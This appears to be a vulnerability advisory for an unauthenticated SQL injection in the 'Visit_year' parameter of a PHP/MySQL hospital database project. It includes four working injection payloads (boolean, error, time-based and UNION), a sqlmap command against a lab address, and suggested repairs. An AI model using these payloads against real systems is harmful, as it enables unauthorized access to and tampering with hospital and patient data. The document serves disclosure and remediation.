# Projectworlds Hospital Database Management System Project using PHP & MySQL Project V1.0 /Procedure3b_yearwiseVisit.php
Projectworlds Hospital Database Management System Project using PHP & MySQL Project V1.0 /Procedure3b_yearwiseVisit.php SQL injection
NAME OF AFFECTED PRODUCT(S)
- Hospital Database Management System Project using PHP & MySQL
Vendor Homepage
- https://1000projects.org/hospital-database-management-system-project-using-php-mysql.html
AFFECTED AND/OR FIXED VERSION(S)
submitter
- wilhelm
Vulnerable File
- /Procedure3b_yearwiseVisit.php
VERSION(S)
- V1.0
Software Link
- https://1000projects.org/hospital-database-management-system-project-using-php-mysql.html
PROBLEM TYPE
Vulnerability Type
- SQL injection
Root Cause
- A SQL injection vulnerability was found in the '/Procedure3b_yearwiseVisit.php' file of the 'Hospital Database Management System Project using PHP & MySQL' project. The reason for this issue is that attackers inject malicious code from the parameter 'Visit_year‘ and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
Impact
- Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
DESCRIPTION
- During the security review of "Hospital Database Management System Project using PHP & MySQL",I discovered a critical SQL injection vulnerability in the "/Procedure3b_yearwiseVisit.php" file. This vulnerability stems from insufficient user input validation of the 'Visit_year' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability lonameion:
- 'Visit_year' parameter
Payload:
Parameter: Visit_year (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: Visit_year=-5325' OR 9110=9110#&save=submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: Visit_year=3' AND GTID_SUBSET(CONCAT(0x7162627671,(SELECT (ELT(6907=6907,1))),0x71707a7071),6907)-- vFwL&save=submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: Visit_year=3' AND (SELECT 2838 FROM (SELECT(SLEEP(5)))yOZF)-- iykM&save=submit
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: Visit_year=3' UNION ALL SELECT NULL,NULL,CONCAT(0x7162627671,0x73514d6e64756f4a494b6e7742416174596d756d516e58536249494467534b4a414a4c4c46774e62,0x71707a7071),NULL#&save=submit
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
《sqlmap -u "http://192.168.37.134:333/Procedure3b_yearwiseVisit.php" --data="Visit_year=3&save=submit" --dbs》
Suggested repair
-
Use prepared statements and parameter binding: Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
-
Input validation and filtering: Strictly validate and filter user input data to ensure it conforms to the expected format.
-
Minimize database user permissions: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
-
Regular security audits: Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.